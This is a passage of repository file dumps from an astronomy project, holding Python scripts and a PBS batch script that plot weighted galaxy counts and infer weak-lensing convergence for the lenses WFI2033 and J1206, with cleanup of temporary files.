np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = 
np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,19)\nrangemax=7\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], 
[np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,19)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_sizeplots_%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW1_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size90_i%s.lst\" % 
(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.679347813129425, "alphanum_fraction": 0.7699275612831116, "avg_line_length": 26.600000381469727, "blob_id": "392dab078aaae919a402150d5aedf69e23687f41", "content_id": "fa8745eabf37e61bf4925eb1a0d64016e2459ff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 552, "license_type": "no_license", "max_line_length": 79, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim8.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log8s.out\n#PBS -e Log8s.err\n#PBS -N 8s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr zoverr\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr zoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr zoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr zoverr\n" }, { "alpha_fraction": 0.6571969985961914, "alphanum_fraction": 0.7026515007019043, "avg_line_length": 25.350000381469727, "blob_id": "d2c4f16d456bcdb0297857caa4e34478218c1f49", "content_id": "2fb898632da220c5687d31ac6bb1556d88e30d5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": 
"no_license", "max_line_length": 68, "num_lines": 20, "path": "/python/reduction_utilities/LRISlongslitredux.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "from LRIS.resample import resample\nimport pyfits,numpy\nfrom LRIS.LRIStools import *\nfrom LRIS.XSolve import *\n\nindir = 'data'\npref = 'r110501_'\nflat = 41 \narc = 36\noutname = 'red_top'\nslitID(indir,pref,[flat,arc,67],outname,side='top',slits=[[50,100]])\noldName = None\nsf = True\nfor img in [67,68,69]:\n newName = '%s_%2d'%(outname,img)\n XSolve(outname,newName,indir,pref,[flat,arc,img])\n SlitCross(newName)\n WaveSolve(newName,oldName,showFit=sf)\n resample(newName,nobgsub=True,clobber=True)\n oldName = newName\n\n" }, { "alpha_fraction": 0.590628981590271, "alphanum_fraction": 0.6349858641624451, "avg_line_length": 62.05601119995117, "blob_id": "e976813939a153771d5fc90f0b20adc7eb4893cc", "content_id": "f7a6332d092214975bf068b04536db25335cd4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54039, "license_type": "no_license", "max_line_length": 761, "num_lines": 857, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshearFITSio_testonly.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu July 21 2018\n# NEED MAKE CHANGES WHEN RUNNING ALL BUT J1206 BECAUSE I WILL HAVE DIFFERENT INPUT FILES AND COLUMNS FOR 23 and 24\n# Run as python /lfs08/rusucs/code/inferkappa_unbiasedwithshearFITSio_testonly.py WFI2033 -1.0 -1.0 nohandpicked fiducial 5 45 23 measured med gal gamma oneoverr mass\n# It does not accept mixed radii or selecting empty inner radii. When a single radius is used (not mixing different radii constraints) this code is faster than inferkappa_unbiasedwithshear45and120_23or24_allowsemptymskandJ1206 because it doesn't read the id column\n# The input weight files have to be FITS files. 
In case of multiple data extensions, data is combined from every extension\n# J1206 is considered separately because their the input weight files do not include columns which use mass\n# Description of arguments: inferkappa_unbiasedwithshear.py lens radius maglim innermask sum/meds gal list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio # https://github.com/esheldon/fitsio\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\nzinf = str(sys.argv[2])\nzsup = str(sys.argv[3])\nhandpicked = str(sys.argv[4])\nother = str(sys.argv[5]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[6])\nradius = str(sys.argv[7])\nmag = str(sys.argv[8])\ncompmeas = str(sys.argv[9])\nmode = str(sys.argv[10])\nconjoined = len(sys.argv) - 11 # total number of arguments including code name, minus the number of ones that are not weights\n\nif handpicked == 'nohandpicked': handpickedstr = ''\nelse: handpickedstr = '_'+str(sys.argv[4])\n\nif conjoined == 1:\n weightin1 = str(sys.argv[11])\nif conjoined == 2:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\nif conjoined == 3:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\n weightin3 = str(sys.argv[13])\nif conjoined == 4:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\n weightin3 = str(sys.argv[13])\n weightin4 = str(sys.argv[14])\n\nprint \"conjoined:\", conjoined\n#root = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\nroot = \"/Users/cerusu/Desktop/test/MSweights/\"\n#root = \"/Volumes/LaCieSubaru/MSweights/\"\n#rootcode = \"/mnt/scratch/rusucs/code/\"\n#rootcode = \"/lfs08/rusucs/code/\"\nrootcode = \"/Users/cerusu/Dropbox/Davis_work/code/J1206/\"\n#rootout = \"/lfs08/rusucs/%s/MSkapparesults/\" % lens\n#rootout = \"/Volumes/LaCieSubaru/kapparesults/\"\nrootout = \"/Users/cerusu/Desktop/test/kapparesults/\"\n#weightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nweightsfile = np.loadtxt(rootcode+'weightedcounts_%s_%ss_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\n#weightsfile = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/%s/weightedcounts_%s_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 1 # refers to the E interval from Greene et al. 
2014\nincrement2 = 1\nincrement3 = 1\nincrement4 = 1\n\n# define the shear constraints\nif lens == \"WFI2033\":\n if other == 'fiducial' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.100\n constrwidth_gamma_inf = 0.090\n constrwidth_gamma_sup = 0.110\n if other == 'chameleon' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.128\n constrwidth_gamma_inf = 0.118\n constrwidth_gamma_sup = 0.138\n if other == 'fiducial' and (handpicked == 'removegrouphandpicked' or innermask == '15' or float(zsup) > 0):\n constr_gamma = 0.095\n constrwidth_gamma_inf = 0.085\n constrwidth_gamma_sup = 0.105\n if other == 'composite' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.148\n constrwidth_gamma_inf = 0.138\n constrwidth_gamma_sup = 0.158\n filters = \"ugrizJHK\"\n print 'shear: ',constr_gamma\nif lens == \"J1206\":\n filters = \"griK\"\n plane = 34\n constr_gamma = 0.04\n constrwidth_gamma_inf = 0.03\n constrwidth_gamma_sup = 0.05\n\n# declare which weights to read\nif radius == \"45\":\n measured_index = 0 # specifies the column index in weightsfile\n measured_index_inf = 1\n measured_index_sup = 2\nif radius == \"120\":\n measured_index = 3\n measured_index_inf = 4\n measured_index_sup = 5\n\nif lens != \"J1206\":\n def declareweight(weightin):\n if weightin == \"gal\": weight_index = 4\n if weightin == \"z\": weight_index = 6\n if weightin == \"mass\": weight_index = 8\n if weightin == \"mass2\": weight_index = 10\n if weightin == \"mass3\": weight_index = 12\n if weightin == \"oneoverr\": weight_index = 14\n if weightin == \"zoverr\": weight_index = 16\n if weightin == \"massoverr\": weight_index = 18\n if weightin == \"mass2overr\": weight_index = 20\n if weightin == \"mass3overr\": weight_index = 22\n if weightin == \"mass2rms\": weight_index = 24\n if weightin == \"mass3rms\": weight_index = 26\n if weightin == \"mass2overrrms\": weight_index = 28\n if weightin == \"mass3overrrms\": weight_index = 30\n if weightin == \"flexion\": weight_index = 32\n if weightin == \"tidal\": weight_index = 34\n if weightin == \"SIS\": weight_index = 36\n if weightin == \"SIShalo\": weight_index = 38\n if weightin == \"gamma\": weight_index = None\n return weight_index\nif lens == \"J1206\":\n def declareweight(weightin):\n if weightin == \"gal\": weight_index = 4\n if weightin == \"z\": weight_index = 5\n if weightin == \"oneoverr\": weight_index = 6\n if weightin == \"zoverr\": weight_index = 7\n if weightin == \"gamma\": weight_index = None\n return weight_index\n\nweight1_index = declareweight(weightin1)\nif conjoined >= 2:\n weight2_index = declareweight(weightin2)\n if conjoined >= 3:\n weight3_index = declareweight(weightin3)\n if conjoined == 4:\n weight4_index = declareweight(weightin4)\n\n# read weight constraints\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = 
weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\ndef declareweight(weightin):\n if weightin == \"gal\": constr_weight = constr_gal_meds; constrwidth_weight_inf = constrwidth_gal_meds_inf; constrwidth_weight_sup = constrwidth_gal_meds_sup\n if weightin == \"z\": constr_weight = constr_z_meds; constrwidth_weight_inf = constrwidth_z_meds_inf; constrwidth_weight_sup = constrwidth_z_meds_sup\n if weightin == \"mass\": constr_weight = constr_mass_meds; constrwidth_weight_inf = constrwidth_mass_meds_inf; constrwidth_weight_sup = constrwidth_mass_meds_sup\n if weightin == \"mass2\": constr_weight = constr_mass2_meds; constrwidth_weight_inf = constrwidth_mass2_meds_inf; constrwidth_weight_sup = constrwidth_mass2_meds_sup\n if weightin == \"mass3\": constr_weight = 
constr_mass3_meds; constrwidth_weight_inf = constrwidth_mass3_meds_inf; constrwidth_weight_sup = constrwidth_mass3_meds_sup\n if weightin == \"oneoverr\": constr_weight = constr_oneoverr_meds; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup\n if weightin == \"zoverr\": constr_weight = constr_zoverr_meds; constrwidth_weight_inf = constrwidth_zoverr_meds_inf; constrwidth_weight_sup = constrwidth_zoverr_meds_sup\n if weightin == \"massoverr\": constr_weight = constr_massoverr_meds; constrwidth_weight_inf = constrwidth_massoverr_meds_inf; constrwidth_weight_sup = constrwidth_massoverr_meds_sup\n if weightin == \"mass2overr\": constr_weight = constr_mass2overr_meds; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup\n if weightin == \"mass3overr\": constr_weight = constr_mass3overr_meds; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup\n if weightin == \"mass2rms\": constr_weight = constr_mass2rms_meds; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup\n if weightin == \"mass3rms\": constr_weight = constr_mass3rms_meds; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup\n if weightin == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup\n if weightin == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup\n if weightin == \"flexion\": constr_weight = constr_flexion_meds; constrwidth_weight_inf = constrwidth_flexion_meds_inf; constrwidth_weight_sup = constrwidth_flexion_meds_sup\n if weightin == \"tidal\": constr_weight = constr_tidal_meds; constrwidth_weight_inf = constrwidth_tidal_meds_inf; constrwidth_weight_sup = constrwidth_tidal_meds_sup\n if weightin == \"SIS\": constr_weight = constr_SIS_meds; constrwidth_weight_inf = constrwidth_SIS_meds_inf; constrwidth_weight_sup = constrwidth_SIS_meds_sup\n if weightin == \"SIShalo\": constr_weight = constr_SIShalo_meds; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup\n if weightin == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 4: constr_weight4, constrwidth_weight4_inf, constrwidth_weight4_sup = declareweight(weightin4)\nif (conjoined == 3) | (conjoined == 4): constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = 